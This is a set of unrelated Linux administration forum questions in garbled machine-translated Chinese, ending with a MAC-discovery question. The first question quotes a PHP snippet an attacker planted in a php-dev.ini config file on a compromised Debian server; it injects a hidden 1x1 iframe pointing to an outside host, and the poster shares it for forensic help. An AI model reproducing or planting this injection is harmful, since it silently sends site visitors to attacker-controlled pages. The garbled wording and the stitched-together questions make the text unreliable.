我有一台运行Debian Lenny的服务器。 最近我遇到了一些安全问题。 我特意看到/etc/php5/conf.d中创build了一个名为“php-dev.ini”的文件。 乍一看,文件看起来正常无害,直到你打开它。 它包含: <?php print "<iframe src='http://google-traf.zyns.com/index.php?tp=4abd7c0637c89d7a' width='1' height='1' frameborder='0'></iframe>"; ?> 很显然,我知道服务器存在安全问题,所以请把“服务器修好了吗? 响应。 这已经完成了。 该服务器已被检查rootkit,并没有可疑的帐户。 我特别感兴趣的是用户或PID正在写入这个目录,并且正在寻找可以用来帮助我的工具。 我已经研究过“iwatch”和“inotify”,但是在我走下一条研究之路之前,我想要得到别人的反馈。 有谁知道一个好的工具,可以帮助我确定: 什么用户正在写入这个目录 什么PID被用来写入文件 哪个应用程序正在写入这个目录 基本上我正在做一些取证和学习监控文件系统。 任何有识之士将不胜感激。 (编辑引用PHP代码示例,因为它以前没有显示过。)
通过RSA密钥的SSH身份validation:〜/ .ssh / authorized_keys。 好的。 有没有办法设置全系统的授权密钥,以便我可以login到任何帐户,包括新创build的帐户? 原因:我有一个服务器,是唯一的pipe理员。 用户帐户被用来隔离网站,以防万一他们被黑客攻击。 我使用SFTP和经常创build新帐户,因此,我厌倦了复制〜/ .ssh / authorized_keys 🙂
我想知道如果我正在编辑文件,如/ etc /主机或/ etc / sysconfig /networking,我应该把一个。 在名字的末尾。 如test.example.com。 有区别吗? 任何事情都会破坏吗?
我想用最less的权限创build用户。 没有家,没有权利,没有壳。 怎么做? 当我打电话useradd它创build用户与家
我使用例如来改变每个人的权限: chmod 777 file 现在,如果我想保留当前的权限呢? 我知道有这样的事情 chmod xx7 file 如果我只想改变世界的权限,但我不能解决(忘记)。 谢谢!
晚上好, 我正在考虑实施一些基于安全考虑和越来越多的服务器来pipe理Linux / Windows服务器密码的方法。 你怎么做呢? 如果有机会,你会怎么做? 我想到的可能是一个关键的服务器与组和双重authentication,或者可能是一个钥匙圈?
我有一个特殊的实验室机器(Linux)和两个不同的用户将使用本机。 他们需要使用相同的用户名login。 我想阻止他们同时login。 我怎样才能做到这一点? 我正在考虑从这样简单的事情开始 – 使用用户源IP地址,并在.bashrc添加一些检查: 如果用户从IPAddress1login,并且已经有人从IPAddress2login,那么会打印一个很大的消息。
我想要一个Debian的简单cron作业,可以检查磁盘满载或高负载等基本的东西。 我相信已经有了解决scheme,所以我可以节省时间,不写我自己的脚本。 任何build议,欢迎。 UPD:我会坚持monit,因为它更容易设置,但是如果我需要更复杂的东西,我会使用Nagios插件。 感谢大家!
我有一个由shell脚本启动的c ++代码。 shell脚本具有以下行来启动c ++代码/home/user/test_client/a.out现在我想捕获这个代码的输出在一个名为message.log的文件中message.log什么是正确的方法来做到这一点? 我已经尝试/home/user/test_client/a.out >> message.log它不起作用。 我在这里做错了什么?
这是真实的情况。 我有4台机器没有任何IP地址连接到交换机。 在其中一台机器上(OS = CentOS),我会安装一个DHCP服务器,并提供其他机器的IP地址。 在给他们分配IP地址之前,我需要获得每个分配IP地址的机器的MAC地址。 所以,我的问题是如何获得连接到交换机的所有机器的MAC地址,当没有机器有任何IP地址呢? 我的使用案例强制要求在MAC地址之前不要有任何IP地址。 -谢谢